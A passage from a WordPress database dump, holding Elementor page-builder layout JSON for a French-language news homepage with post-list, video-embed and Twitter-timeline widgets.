idgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Guin\\u00e9e innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1464,500,'_elementor_version','0.4'),(1465,500,'_elementor_css','a:3:{s:4:\"time\";i:1508922102;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1467,501,'_elementor_edit_mode','builder'),(1468,501,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Guin\\u00e9e innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1469,501,'_elementor_version','0.4'),(1470,501,'_elementor_css','a:3:{s:4:\"time\";i:1508924012;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1472,502,'_elementor_edit_mode','builder'),(1473,502,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"verti